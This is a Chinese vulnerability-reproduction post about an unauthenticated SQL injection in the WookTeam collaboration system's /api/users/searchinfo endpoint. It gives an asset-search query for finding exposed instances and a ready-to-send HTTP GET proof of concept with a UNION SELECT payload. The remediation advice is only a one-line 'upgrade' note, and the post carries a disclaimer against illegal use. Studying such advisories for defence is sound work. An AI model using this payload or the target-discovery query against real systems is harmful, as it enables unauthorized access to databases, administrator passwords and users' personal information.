文章总结： WookTeam轻量级团队在线协作系统的/api/users/searchinfo接口存在SQL注入漏洞，允许未经身份验证的攻击者获取数据库信息甚至服务器权限。该漏洞基于PHP语言开发的项目，可通过特定POC进行验证。攻击者可能获取管理员密码和用户个人信息，建议用户立即升级到最新版本以修复此安全漏洞。 综合评分： 86 文章分类： 漏洞分析,WEB安全,漏洞POC,漏洞预警,应用安全

WookTeam轻量级的团队在线协作系统存在SQL注入漏洞

原创

安服仔

北风漏洞复现文库

2025年12月15日 10:11 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

01

—

漏洞名称

WookTeam轻量级的团队在线协作系统存在SQL注入漏洞

02

—

影响版本

                            WookTeam轻量级的团队在线协作系统

03

—

漏洞简介

wookteam项目基于PHP语言开发，项目搭建需要PHP相关环境，涉及中间件技术以及Nginx和MySQL。该项目很容易在Docker环境中部署。下载源码后，使用./cmdinstall命令一键构建项目。Wookteam是一个支持在线协作管理和沟通的开源平台。它提供在线流程图、思维导图构建以及项目管理的可视化展示和分析，让项目团队成员直观地看到项目的进展情况和相关问题。WookTeam /api/users/searchinfo接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。

04

—

资产测绘

title="Wookteam"

05

—

漏洞复现

 POC

GET /api/users/searchinfo?where[username]=1%27%29+UNION+ALL+SELECT+NULL%2CCONCAT%280x7e%2Cversion%28%29%2C0x7e%29%2CNULL%2CNULL%2CNULL%23 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: keep-alive

06

—

修复建议

升级到最新版本。

07

—

往期回顾

查看原文：《WookTeam轻量级的团队在线协作系统存在SQL注入漏洞》